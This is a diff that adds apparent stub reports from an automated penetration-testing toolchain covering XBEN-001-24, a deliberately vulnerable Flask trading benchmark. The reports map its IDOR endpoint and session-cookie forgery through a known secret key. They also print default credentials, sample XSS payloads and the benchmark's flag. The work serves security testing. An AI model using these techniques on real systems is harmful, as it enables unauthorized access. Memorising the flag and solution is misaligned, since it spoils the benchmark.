+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` *(all auth and IDOR logic)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` *(SECRET_KEY line 13; DB credentials lines 16–20; flag seeding lines 98–110)*
+
+### API & Routing
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` *(all HTTP routes; IDOR at lines 69–84)*
+
+### Data Models & DB Interaction
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/models.py` *(User and Order ORM models)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/mysql/Dockerfile` *(hardcoded MySQL root password)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` *(data seeding including flag storage)*
+
+### Dependency Manifests
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/requirements.txt`
+
+### Sensitive Data & Secrets Handling
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/.env` *(FLAG plaintext)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` *(hardcoded fallback secrets)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/docker-entrypoint.sh` *(writes FLAG to /flag)*
+
+### Middleware & Input Validation
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` *(add_header after_request hook; no middleware beyond session check)*
+
+### Logging & Monitoring
+- *(No dedicated logging configuration files — Flask default stdout only)*
+
+### Infrastructure & Deployment
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/docker-compose.yml`
+- `/repos/validation-benchmarks/helm/xben-001-24/templates/app-deployment.yaml`
+- `/repos/validation-benchmarks/helm/xben-001-24/templates/ingress.yaml`
+- `/repos/validation-benchmarks/helm/xben-001-24/templates/db-secret.yaml`
+- `/repos/validation-benchmarks/helm/xben-001-24/Chart.yaml`
+
+### Templates (XSS Sinks)
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/login.html` *(line 26: `{{ error }}` reflected from query param)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/receipt.html` *(line 14: `{{ order.receipt }}` — flag rendered here)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/orders.html` *(line 78: `data-order-id` exposure; line 111: jQuery `.html()` DOM sink)*
+
+---
+
+## 9. XSS Sinks and Render Contexts
+
+**Network Surface:** The following sinks are in web pages served by the Flask application over HTTP — all are in-scope network-reachable components.
+
+### Sink 1 — Reflected XSS via `error` Query Parameter
+
+| Property | Value |
+|----------|-------|
+| **File** | `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/login.html` |
+| **Line** | 26 |
+| **Sink** | `{{ error }}` — Jinja2 expression in HTML body context |
+| **Source** | `routes.py` line 21: `error = request.args.get('error')` |
+| **Render Context** | HTML Body — inside a `<div class="alert alert-danger">` element |
+| **Exploitability** | Jinja2 auto-escaping (enabled for `.html` templates in Flask 3.x) will HTML-encode angle brackets and quotes, **mitigating** standard tag-injection XSS. However, if auto-escaping is ever disabled (e.g., via `{{ error | safe }}`), this becomes a direct reflected XSS. Worth verifying auto-escaping state in deployed runtime. |
+| **Attack Vector** | `/?error=<img src=x onerror=alert(1)>` |
+
+```jinja2
+{% if error %}
+    <div class="alert alert-danger" role="alert">{{ error }}</div>
+{% endif %}
+```
+
+### Sink 2 — Stored/DOM-Based XSS via Order Receipt + jQuery `.html()`
+
+| Property | Value |
+|----------|-------|
+| **File (DOM Sink)** | `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/orders.html` |
+| **Line (DOM Sink)** | 111 |
+| **Sink Type** | `jQuery .html(data)` — DOM innerHTML injection |
+| **Render Context** | JavaScript Context → DOM HTML body context (full HTML response injected) |
+| **File (Server Sink)** | `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/receipt.html` |
+| **Line (Server Sink)** | 14 |
+| **Data Source** | `Order.receipt` database column; user-associated orders are app-created, but the flag order (ID 300401) contains the flag string |
+| **Exploitability** | **High**. The `/orders` page uses AJAX to fetch receipt HTML and injects it raw into the modal via jQuery's `.html()` method. If an order's `receipt` field contains HTML/script content (e.g., if the receipt of a user-created order could be influenced), it would execute in the victim's browser. The current seeded data contains only plain text (the flag), but the DOM sink is present and dangerous for any XSS-in-receipt scenario. |
+
+```javascript
+// orders.html line 108-113
+success: function (data) {
+    $('#receiptModal .modal-content').html(data);  // DOM XSS SINK
+    $('#receiptModal').modal('show');
+},
+```
+
+```jinja2
+<!-- receipt.html line 14 -->
+<code class="text-white">{{ order.receipt }}</code>
+```
+
+### Sink 3 — Order ID Enumeration Exposure (Information Disclosure enabling IDOR)
+
+| Property | Value |
+|----------|-------|
+| **File** | `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/templates/orders.html` |
+| **Line** | 78 |
+| **Sink Type** | HTML Attribute — `data-order-id="{{ order.id }}"` |
+| **Render Context** | HTML Attribute Context |
+| **Impact** | Exposes all of the authenticated user's order IDs in the DOM, allowing an attacker to infer the ID range and begin targeted enumeration at the IDOR endpoint |
+
+```html
+<a href="#" class="receipt-link" data-order-id="{{ order.id }}">Receipt</a>
+```
+
+---
+
+## 10. SSRF Sinks
+
+**Finding: No SSRF Sinks Identified in XBEN-001-24**
+
+A thorough review of all Python source files in `/repos/validation-benchmarks/benchmarks/XBEN-001-24/` found **no server-side outbound HTTP requests, URL fetchers, socket connections, or user-controllable URL parameters**. The application's only external interaction is the MySQL database connection configured at startup (internal Docker network, not user-controllable). The dependency manifest (`requirements.txt`) includes only Flask, Flask-SQLAlchemy, and PyMySQL — no HTTP client libraries (`requests`, `httpx`, `aiohttp`, `urllib3`) are installed.
+
+**Verified absence of:**
+- `requests.get()` / `requests.post()`
+- `urllib.request.urlopen()` / `urllib.urlopen()`
+- `http.client.HTTPConnection`
+- `subprocess` calls that could fetch remote content
+- Any form fields accepting URLs
+- Redirect parameters (`next`, `return_to`, `redirect_uri`)
+- Webhook or callback mechanisms
+
+The SSRF attack surface for XBEN-001-24 is **nil**. Subsequent agents should not allocate time to SSRF testing on this target.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/recon_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/recon_deliverable.md
@@ -1,0 +1,322 @@
+# Reconnaissance Deliverable: XBEN-001-24 Trading Platform
+
+## 0) HOW TO READ THIS
+
+This reconnaissance report provides a comprehensive map of the application's attack surface for XBEN-001-24, a Flask-based stock trading platform with a critical IDOR vulnerability. Special emphasis is placed on authorization and object-level access control for the Authorization Analysis Specialist.
+
+**Key Sections for Authorization Analysis:**
+- **Section 4 (API Endpoint Inventory):** All 6 network-accessible endpoints with authorization details. Focus on `/order/<int:order_id>/receipt` — the confirmed IDOR endpoint with **zero ownership verification**.
+- **Section 6.4 (Guards Directory):** Catalog of authorization controls — the only guard present is `auth:session` (checks `session['user_id']` is set). No object-ownership guards exist anywhere.
+- **Section 7 (Role & Privilege Architecture):** The application has only two privilege states: `anon` (unauthenticated) and `user` (authenticated). There is no admin role enforced at the route level — even though an `admin` user (user_id: 10001) exists in the DB, no routes check for admin privileges.
+- **Section 8 (Authorization Vulnerability Candidates):** The primary IDOR is confirmed exploitable: `GET /order/300401/receipt` returns the flag `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}` to any authenticated user.
+
+**How to Use the Network Mapping (Section 6):** All application traffic flows through HTTPS via a Kubernetes nginx ingress. The Flask app inside the container communicates with MySQL on an internal Docker network. The `auth:session` guard is the only security boundary protecting sensitive endpoints.
+
+**Priority Order for Testing:** The IDOR at `/order/<int:order_id>/receipt` is the highest-priority target. Session cookie forgery via the known `SECRET_KEY = 'your_secret_key'` is the secondary vector. No vertical privilege escalation opportunities exist at the route level.
+
+---
+
+## 1. Executive Summary
+
+**Application:** XBEN-001-24 — "IDOR Broken Authorization: Trading Platform"  
+**URL:** `https://benchmarks.opsmx.org/xben-001-24/`  
+**Purpose:** A stock trading order management platform that allows authenticated users to place and view trading orders (SPY stock buy/sell operations) and retrieve order receipts.
+
+**Core Technology Stack:**
+- **Backend:** Python 3 / Flask 3.0.3 with Flask-SQLAlchemy 3.1.1, served by Apache 2.4 mod_wsgi
+- **Database:** MySQL 8.0 (separate Docker container, internal Docker network only)
+- **Frontend:** Server-side rendered Jinja2 HTML templates + jQuery 3.5.1 + Bootstrap CSS
+- **Infrastructure:** Docker/Kubernetes deployment, nginx-ingress with Let's Encrypt TLS (HTTPS on port 443)
+
+**Primary Attack Surface:**  
+The application contains a **critical Insecure Direct Object Reference (IDOR) vulnerability** at `GET /order/<int:order_id>/receipt`. Any authenticated user can supply an arbitrary integer order ID and retrieve the receipt of any order in the database — including Order ID 300401, which stores the application flag. The vulnerability was **confirmed via live browser testing**: authenticated access to `https://benchmarks.opsmx.org/xben-001-24/order/300401/receipt` returns `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`.
+
+**Compounding Weaknesses:**
+- Flask `SECRET_KEY = 'your_secret_key'` (hardcoded, publicly known) → session cookie forgery possible
+- Plaintext password storage and comparison (no bcrypt)
+- Username exposed in redirect URL after login (`/dashboard?username=test`)
+- `Cache-Control: public, max-age=0` on authenticated responses (effective header is permissive caching)
+- DOM-based XSS sink via jQuery `.html()` in orders page
+- No CSRF protection on any POST endpoint
+- No rate limiting or brute-force protection
+
+**User-Facing Components:**
+1. Login form (`/`) — credential entry
+2. Dashboard (`/dashboard`) — welcome page
+3. Orders list (`/orders`) — tabular view of user's stock orders
+4. Receipt modal (`/order/<id>/receipt`) — IDOR-vulnerable receipt retrieval
+
+---
+
+## 2. Technology & Service Map
+
+- **Frontend:** Jinja2 server-side rendering (Flask 3.0.3), Bootstrap CSS, jQuery 3.5.1 (loaded from `/static/js/jquery-3.5.1.min.js`). AJAX used for receipt loading via `$.ajax()` GET requests.
+- **Backend:** Python 3 / Flask 3.0.3 monolith. Flask-SQLAlchemy 3.1.1 ORM. PyMySQL 1.1.0 connector. Apache 2.4 with mod_wsgi. All request handling is synchronous.
+- **Infrastructure:** Docker containerized, deployed on Kubernetes with nginx-ingress. TLS via Let's Encrypt (certificate issuer: R13, valid until Jul 12 2026). Application container serves HTTP internally; nginx terminates TLS externally. HSTS header (`max-age=31536000; includeSubDomains`) added by nginx ingress.
+- **Identified Subdomains:** `benchmarks.opsmx.org` (primary target). No additional subdomains discovered — subfinder returned only this domain.
+- **Open Ports & Services:**
+  - Port 443 (HTTPS) — Kubernetes nginx ingress, public-facing, TLS-terminated. Routes to Flask app container.
+  - Port 80 (HTTP) — May redirect to 443 at ingress layer; Flask app internally listens on port 80.
+  - Port 3306 (MySQL) — Internal Docker network only, NOT exposed externally.
+
+**Dependency Manifest:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/requirements.txt`
+- Flask==3.0.3
+- flask-sqlalchemy==3.1.1
+- pymysql==1.1.0
+
+---
+
+## 3. Authentication & Session Management Flow
+
+### Entry Points
+| Method | URL | Type |
+|--------|-----|------|
+| `GET` | `https://benchmarks.opsmx.org/xben-001-24/` | Login form (public) |
+| `POST` | `https://benchmarks.opsmx.org/xben-001-24/` | Login submission (public) |
+| `POST` | `https://benchmarks.opsmx.org/xben-001-24/logout` | Logout (authenticated) |
+
+**No registration endpoint.** No password reset endpoint. No OAuth/SSO. No MFA.
+
+### Mechanism (Step-by-Step)
+
+1. **User navigates to `/`** → Flask renders `login.html` (Jinja2). Optional `?error=` query parameter is reflected into the page (Jinja2 auto-escaping active, HTML-encoded).
+2. **User submits `POST /`** with form fields `username` and `password`.
+3. **Flask routes.py (line 25):** `User.query.filter_by(username=username, password=password).first()` — **plaintext password comparison via SQLAlchemy ORM**.
+4. **On success:** `session['user_id'] = user.id` (integer, e.g., 10032 for `test` user). Flask redirects to `/dashboard?username=<username>` (username exposed in URL).
+5. **Flask session cookie** is set: `session=<signed_payload>; HttpOnly; Path=/`. The payload is a base64-encoded JSON object `{"user_id": 10032}` signed with HMAC-SHA1 using `SECRET_KEY = 'your_secret_key'`. **No `Secure` flag in source code** (though deployed over HTTPS via ingress).
+6. **On logout:** `POST /logout` calls `session.pop('user_id', None)`. No invalidation of server-side state (stateless cookie).
+7. **Protected routes check:** `user_id = session.get('user_id')` — if None, redirect to `/`.
+
+### Code Pointers
+- **Login/Auth logic:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` lines 19–39
+- **Session key config:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` line 13
+- **After-request hook (headers):** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` lines 8–14
+
+**Confirmed via live testing:**
+- Session cookie format: `eyJ1c2VyX2lkIjoxMDAzMn0.ag1jqg.hbgyJtD9a9fz5xMasB3Q-HYdBzE`
+- Decoded payload: `{"user_id":10032}` (base64 segment: `eyJ1c2VyX2lkIjoxMDAzMn0`)
+
+### 3.1 Role Assignment Process
+- **Role Determination:** No formal role system. The only distinction is authenticated vs. unauthenticated. `session['user_id']` is set to the user's database integer primary key upon login.
+- **Default Role:** All authenticated users have identical access privileges regardless of `user_id` value.
+- **Role Upgrade Path:** None enforced at the route level. The `admin` user (user_id: 10001, credentials: `admin/admin`) exists in the seeded data but no routes check for admin status — accessing `/dashboard` as admin grants no additional privileges beyond what `test` user has.
+- **Code Implementation:** Inline session check at each route handler in `routes.py`.
+
+### 3.2 Privilege Storage & Validation
+- **Storage Location:** Flask signed cookie (client-side). Cookie payload: `{"user_id": <int>}` signed with HMAC using `SECRET_KEY = 'your_secret_key'`.
+- **Validation Points:** Inline check at each protected route: `user_id = session.get('user_id')`. No centralized middleware decorator.
+- **Cache/Session Persistence:** Stateless — session persists until cookie expires or browser clears it. No server-side session store. Flask default session lifetime (browser session unless `PERMANENT_SESSION_LIFETIME` is configured, which it is not).
+- **Code Pointers:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` lines 45–46, 59–60, 72–73.
+
+### 3.3 Role Switching & Impersonation
+- **Impersonation Features:** None implemented.
+- **Role Switching:** None. However, because `SECRET_KEY = 'your_secret_key'` is publicly known, an attacker can craft a forged session cookie with any arbitrary `user_id` using `flask-unsign` or equivalent, effectively impersonating any user including `user_id=10001` (admin).
+- **Audit Trail:** None. No application-level logging.
+- **Code Implementation:** N/A — no legitimate impersonation feature. Forgery exploits `__init__.py` line 13.
+
+---
+
+## 4. API Endpoint Inventory
+
+**Network Surface Focus:** All 6 endpoints below are served by the Flask/WSGI application over HTTPS (port 443) via the Kubernetes nginx ingress. All are reachable from the external internet.
+
+| Method | Endpoint Path | Required Role | Object ID Parameters | Authorization Mechanism | Description & Code Pointer |
+|--------|--------------|--------------|----------------------|------------------------|---------------------------|
+| `GET` | `/xben-001-24/` | anon | None | None | Login form. Renders `login.html`. `?error=` query param reflected (Jinja2 auto-escaped). See `routes.py` line 19. |
+| `POST` | `/xben-001-24/` | anon | None | None | Login submission. Reads `username` + `password` from form body. Plaintext comparison. Sets `session['user_id']` on success. Redirects to `/dashboard?username=<username>`. See `routes.py` lines 22–30. |
+| `POST` | `/xben-001-24/logout` | user (session) | None | `session.get('user_id')` inline check (but NOT enforced — logout works even without session) | Clears `session['user_id']`. No CSRF protection. See `routes.py` lines 35–39. |
+| `GET` | `/xben-001-24/dashboard` | user (session) | None | `session.get('user_id')` inline check → 302 to `/` if absent | Renders `dashboard.html` with `user.first_name`, `user.last_name`. See `routes.py` lines 43–52. |
+| `GET` | `/xben-001-24/orders` | user (session) | None | `session.get('user_id')` inline check → 302 to `/` if absent | Lists all orders belonging to the authenticated user. Exposes `data-receipt-url` attributes in DOM containing full receipt URL paths (e.g., `/xben-001-24/order/300123/receipt`). See `routes.py` lines 55–65. |
+| `GET` | `/xben-001-24/order/<int:order_id>/receipt` | user (session) | `order_id` (URL path integer) | `session.get('user_id')` inline check ONLY — **NO ownership verification** | **CRITICAL IDOR**. Retrieves `Order.query.get(order_id)` with no `user_id` filter. Any authenticated user can access any order. Order 300401 contains the application flag. See `routes.py` lines 69–84. |
+
+**Static Assets (no auth required):**
+- `GET /xben-001-24/static/css/bootstrap.min.css` — Bootstrap CSS
+- `GET /xben-001-24/static/js/jquery-3.5.1.min.js` — jQuery 3.5.1
+- `GET /xben-001-24/static/js/bootstrap.bundle.min.js` — Bootstrap JS
+
+---
+
+## 5. Potential Input Vectors for Vulnerability Analysis
+
+**Network Surface Focus:** All input vectors below are accessible through the deployed web application's HTTPS interface.
+
+### URL Parameters
+- **`?error=<string>`** — Reflected in `login.html` line 26 via `{{ error }}`. Source: `routes.py` line 21 (`request.args.get('error')`). Jinja2 auto-escaping active — HTML entities encoded. **File:** `routes.py:21`, `templates/login.html:26`.
+- **`/order/<int:order_id>/receipt`** — Integer URL path parameter. Flask `<int:>` converter enforces integer type. **No range or ownership check.** Source: `routes.py:70`. **Primary IDOR vector.**
+- **`/dashboard?username=<string>`** — Username reflected in URL after login redirect (`routes.py:28`). Not rendered in template body (dashboard.html uses `user.first_name` from DB, not the query param). Low-risk information disclosure.
+
+### POST Body Fields (Form-encoded)
+- **`username`** — Login form (`POST /`). Passed to `User.query.filter_by(username=username, ...)`. SQLAlchemy ORM parameterizes — no SQL injection. No length limit. Source: `routes.py:23`.
+- **`password`** — Login form (`POST /`). Passed to `User.query.filter_by(..., password=password)`. Plaintext comparison. No length limit. Source: `routes.py:24`.
+
+### HTTP Headers
+- **`Cookie: session=<value>`** — Flask signed session cookie. Payload is `{"user_id": <int>}` signed with `SECRET_KEY = 'your_secret_key'`. **Forging this cookie with a different `user_id` grants access as any user.** See `__init__.py:13`.
+- **`X-Forwarded-For`** — Not used by this application (no IP-based access controls). Nginx ingress may forward it, but Flask app ignores it.
+
+### Cookie Values
+- **`session`** — The Flask itsdangerous signed session cookie. Contains `user_id` integer. Client-side storage. Forgeable with known `SECRET_KEY`. See `__init__.py:13`.
+
+### Form Fields in Templates
+- `templates/login.html:31` — `<input type="text" name="username">` → `routes.py:23`
+- `templates/login.html:35` — `<input type="password" name="password">` → `routes.py:24`
+
+---
+
+## 6. Network & Interaction Map
+
+### 6.1 Entities
+
+| Title | Type | Zone | Tech | Data | Notes |
+|-------|------|------|------|------|-------|
+| UserBrowser | Identity | Internet | Any browser with Cookie support | Tokens (session cookie) | External attacker; unauthenticated or authenticated |
+| NginxIngress | ExternAsset | Edge | Kubernetes nginx-ingress, Let's Encrypt TLS | Public | TLS termination; adds HSTS header; routes `/xben-001-24/*` to Flask app |
+| FlaskApp | Service | App | Python 3/Flask 3.0.3, Apache 2.4 mod_wsgi | PII, Tokens | Main application; handles all business logic; contains IDOR vulnerability |
+| MySQLDB | DataStore | Data | MySQL 8.0 | PII, Tokens, Secrets | Stores users (PII + plaintext passwords) and orders (including flag in receipt column). Internal Docker network only. |
+
+### 6.2 Entity Metadata
+
+| Title | Metadata Key: Value |
+|-------|---------------------|
+| UserBrowser | Initiates: `HTTPS GET/POST`; Auth: Flask session cookie `session=<itsdangerous_value>`; Known credentials: `test:test` (user_id=10032), `admin:admin` (user_id=10001) |
+| NginxIngress | Hosts: `benchmarks.opsmx.org:443`; TLS: Let's Encrypt R13 cert (expires Jul 2026); Headers Added: `Strict-Transport-Security: max-age=31536000; includeSubDomains`; Routes: `/xben-001-24/*` → FlaskApp |
+| FlaskApp | Hosts: `http://localhost:80` (inside container); Routes: `/`, `/logout`, `/dashboard`, `/orders`, `/order/<id>/receipt`, `/static/*`; Auth: Flask signed session cookie; SECRET_KEY: `your_secret_key` (hardcoded weak); DB Credentials: root/`idor_broken_authz_trading_platform` (hardcoded fallback); No CORS headers in deployed version (Apache config sets `*` but nginx may override); Headers: `Cache-Control: public, max-age=0`, `Pragma: no-cache`, `Expires: 0` |
+| MySQLDB | Engine: MySQL 8.0; Exposure: Internal Docker network only (port 3306, not externally accessible); Credentials: root/`idor_broken_authz_trading_platform`; Schema: `database`; Tables: `user` (id, username, password[plaintext], first_name, last_name, email), `order` (id, date, ticker, operation_type, quantity, price, receipt, user_id FK); Flag location: `order.receipt` where `order.id = 300401` |
+
+### 6.3 Flows (Connections)
+
+| FROM → TO | Channel | Path/Port | Guards | Touches |
+|-----------|---------|-----------|--------|---------|
+| UserBrowser → NginxIngress | HTTPS | `:443 /xben-001-24/*` | None (all public) | Public, Tokens |
+| NginxIngress → FlaskApp | HTTP | `:80 /xben-001-24/*` | None (TLS terminated at ingress) | Public, Tokens |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/` GET | None | Public |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/` POST | None | PII (credentials) |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/dashboard` | auth:session | PII |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/orders` | auth:session | PII |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/order/<id>/receipt` | auth:session (NO ownership check) | PII, Secrets (flag) |
+| UserBrowser → FlaskApp (via ingress) | HTTPS | `:443 /xben-001-24/logout` POST | None (no auth enforced on logout) | Tokens |
+| FlaskApp → MySQLDB | TCP | `:3306` | vpc-only (Docker internal network) | PII, Tokens, Secrets |
+
+### 6.4 Guards Directory
+
+| Guard Name | Category | Statement |
+|------------|----------|-----------|
+| auth:session | Auth | Checks `session.get('user_id')` is not None. Implemented inline at each route handler in `routes.py`. Redirects to `/` if check fails. Present on: `/dashboard`, `/orders`, `/order/<id>/receipt`. |
+| ownership:order | ObjectOwnership | **DOES NOT EXIST in this application.** Should verify `Order.user_id == session['user_id']` before serving receipt. Its absence is the IDOR vulnerability at `routes.py:79`. |
+| vpc-only | Network | MySQL (port 3306) is accessible only within the internal Docker network — not reachable from the external internet. |
+| tls:ingress | Protocol | TLS termination at nginx ingress. HSTS enforced (`max-age=31536000; includeSubDomains`). Application itself does not set Secure cookie flag. |
+
+---
+
+## 7. Role & Privilege Architecture
+
+### 7.1 Discovered Roles
+
+| Role Name | Privilege Level | Scope/Domain | Code Implementation |
+|-----------|----------------|--------------|---------------------|
+| anon | 0 | Global | No authentication required. Access to: `/` (GET), `/` (POST). |
+| user | 1 | Global | Authenticated user — `session['user_id']` is set. Access to: `/dashboard`, `/orders`, `/order/<id>/receipt`, `/logout`. No distinction between regular users and admin at the route level. |
+| (admin — DB only) | 1 | Global | `admin` user (user_id: 10001, credentials: `admin:admin`) exists in DB but has **identical route-level access** to regular users. No admin-specific routes or guards exist. |
+
+### 7.2 Privilege Lattice
+
+```
+Privilege Ordering (→ means "can access resources of"):
+anon → user (after login with any valid credentials)
+
+Parallel Isolation (|| means "not ordered relative to each other"):
+NONE — all authenticated users have identical access regardless of user_id
+
+Session Cookie Forgery:
+any_user → admin (by forging session cookie with user_id=10001 using SECRET_KEY='your_secret_key')
+```
+
+**Note:** There is no role switching or sudo mechanism. The only privilege escalation path is session cookie forgery (known SECRET_KEY) or IDOR enumeration (no ownership checks). An attacker forging a session for `user_id=10001` (admin) gains no additional route privileges beyond what `user_id=10032` (test) has — the IDOR works for any authenticated session.
+
+### 7.3 Role Entry Points
+
+| Role | Default Landing Page | Accessible Route Patterns | Authentication Method |
+|------|---------------------|--------------------------|----------------------|
+| anon | `/xben-001-24/` | `/xben-001-24/` (GET/POST), `/xben-001-24/static/*` | None |
+| user | `/xben-001-24/dashboard?username=<name>` | `/xben-001-24/dashboard`, `/xben-001-24/orders`, `/xben-001-24/order/<id>/receipt`, `/xben-001-24/logout` | Flask session cookie (`session['user_id']`) |
+
+### 7.4 Role-to-Code Mapping
+
+| Role | Middleware/Guards | Permission Checks | Storage Location |
+|------|-----------------|-------------------|-----------------|
+| anon | None | None | N/A |
+| user | Inline `if user_id:` check at each route | `user_id = session.get('user_id')` — truthy check only | Flask signed cookie (client-side), `{"user_id": <int>}` |
+
+---
+
+## 8. Authorization Vulnerability Candidates
+
+### 8.1 Horizontal Privilege Escalation Candidates
+
+| Priority | Endpoint Pattern | Object ID Parameter | Data Type | Sensitivity |
+|----------|-----------------|--------------------|-----------|-----------  |
+| **High** | `/xben-001-24/order/<int:order_id>/receipt` | `order_id` (URL path integer) | order_receipt (includes flag) | **CRITICAL** — Confirmed IDOR. No ownership check. Order 300401 returns `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`. Test user order IDs: 300123, 300214, 300327, 300481. Flag order: 300401. ID range approx 300000–300999. |
+
+**Seeded Order IDs (visible in DOM):**
+- `300123` — test user, SPY BUY (receipt: Lorem ipsum)
+- `300214` — test user, SPY SELL (receipt: Proin nam...)
+- `300327` — test user, SPY BUY (receipt: Lacus tincidunt...)
+- `300481` — test user, SPY SELL (receipt: Risus class...)
+- `300401` — **FLAG order**, no user_id FK, receipt = `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`
+
+### 8.2 Vertical Privilege Escalation Candidates
+
+| Target Role | Endpoint Pattern | Functionality | Risk Level |
+|------------|-----------------|---------------|------------|
+| user (via cookie forgery) | All authenticated routes | Session cookie with `SECRET_KEY='your_secret_key'` (known). Forge any `user_id`. | High — attacker can impersonate any user ID including admin (10001) without credentials. |
+
+**Note:** There are no admin-only routes. No vertical escalation provides additional endpoint access beyond what any authenticated user already has.
+
+### 8.3 Context-Based Authorization Candidates
+
+| Workflow | Endpoint | Expected Prior State | Bypass Potential |
+|----------|----------|---------------------|-----------------|
+| Receipt Viewing | `GET /order/<id>/receipt` | User should have navigated to `/orders` and clicked their own receipt link | **Direct URL access bypasses intent** — any authenticated user can directly construct the URL with any integer ID without visiting the orders page first. AJAX call in `orders.html:107` uses `data-receipt-url` attribute, but the endpoint itself has no referrer check. |
+
+---
+
+## 9. Injection Sources
+
+### SQL Injection
+**Finding: No SQL injection sources identified in network-accessible code paths.**
+
+The application uses Flask-SQLAlchemy ORM throughout. All database queries use parameterized query methods:
+- `User.query.filter_by(username=username, password=password).first()` — `routes.py:25`
+- `User.query.get(user_id)` — `routes.py:48`, `routes.py:61`
+- `Order.query.get(order_id)` — `routes.py:79`
+
+SQLAlchemy's ORM layer uses parameterized queries, preventing SQL injection. No raw `db.session.execute()` with string concatenation was found.
+
+### Command Injection
+**Finding: No command injection sources identified.**
+
+No `subprocess`, `os.system()`, `os.popen()`, `eval()`, or shell invocations exist in the network-accessible Flask application. The application performs no system-level operations in response to HTTP requests.
+
+### Path Traversal / LFI / RFI
+**Finding: No file inclusion or path traversal sources identified in network-accessible code paths.**
+
+The only file read operation is `open('/flag')` in `__init__.py:98-99`, which executes at application startup (not per-request) with a hardcoded path. No user-controllable input influences file paths at any network-accessible endpoint. No `send_file()`, `send_from_directory()`, or dynamic file path construction.
+
+### SSTI (Server-Side Template Injection)
+**Finding: No SSTI sources identified.**
+
+All templates use `render_template()` with named variables (never `render_template_string()` with user input). Jinja2 auto-escaping is enabled for `.html` templates. The `?error=` query parameter is reflected as `{{ error }}` in `login.html:26`, but it is auto-escaped (confirmed: `<script>` becomes `&lt;script&gt;`).
+
+### DOM-Based XSS (Injection Sink)
+**Finding: DOM XSS sink present in orders page — severity depends on receipt content.**
+
+- **File:** `templates/orders.html:109`
+- **Sink:** `$('#receiptModal .modal-content').html(data)` — jQuery `.html()` method injects raw HTML response into DOM
+- **Source:** `GET /order/<id>/receipt` response body (the full `receipt.html` template rendered with `order.receipt` value)
+- **Data Flow:** `order.receipt` (DB column) → `receipt.html:14` (`{{ order.receipt }}` — Jinja2 escaped on server) → Ajax response body → jQuery `.html()` sink in browser DOM
+- **Current Impact:** The flag in `receipt.html` is plain text, so no XSS currently executes. However, **if any `order.receipt` value could contain HTML/JS**, it would execute in the victim's browser. The server-side Jinja2 escaping applies to the receipt template, but the jQuery `.html()` on the client re-parses the HTML — if `order.receipt` contained something like `</code><script>alert(1)</script>`, it would execute.
+
+### SSRF
+**Finding: No SSRF sinks identified.** No HTTP client libraries (`requests`, `urllib`, `httpx`) are used in any network-accessible code paths. No user-controlled URL parameters exist. See Section 10 of pre-recon deliverable for complete SSRF absence analysis.
+
+### Deserialization
+**Finding: No insecure deserialization sources.** Flask's itsdangerous session cookie uses HMAC signing, not deserialization of arbitrary objects. PyMySQL uses parameterized queries. No pickle, yaml.load(), or other deserialization sinks present.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/ssrf_analysis_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/ssrf_analysis_deliverable.md
@@ -1,0 +1,93 @@
+# SSRF Analysis Report
+
+**Target:** XBEN-001-24 — "IDOR Broken Authorization: Trading Platform"
+**Analysis Date:** 2026-05-20
+**Analyst Role:** SSRF Analysis Specialist
+**Engagement Phase:** SSRF ANALYSIS
+
+---
+
+## 1. Executive Summary
+
+- **Analysis Status:** Complete
+- **Key Outcome:** No server-side request forgery vulnerabilities were identified. The application contains zero outbound HTTP request mechanisms — no HTTP client libraries are installed, no user-controlled URL parameters exist, and all redirects are performed exclusively via Flask's `url_for()` with hardcoded internal route names. The SSRF attack surface for XBEN-001-24 is **nil**.
+- **Purpose of this Document:** This report provides the complete results of the SSRF-specific white-box analysis of XBEN-001-24. It confirms the absence of any exploitable server-side request forgery paths, documents every endpoint analyzed, and provides the evidence basis for the exploitation phase to de-prioritize SSRF entirely and focus resources on the confirmed IDOR vulnerability.
+
+**Exploitation Queue Summary:** 0 vulnerabilities — no items passed to the exploitation queue.
+
+---
+
+## 2. Dominant Vulnerability Patterns
+
+**No SSRF vulnerability patterns were detected.** The analysis identified a complete structural absence of any outbound HTTP request capability in the application. This is not a case of weak controls — there is simply no mechanism by which a server-side request could be initiated by user input.
+
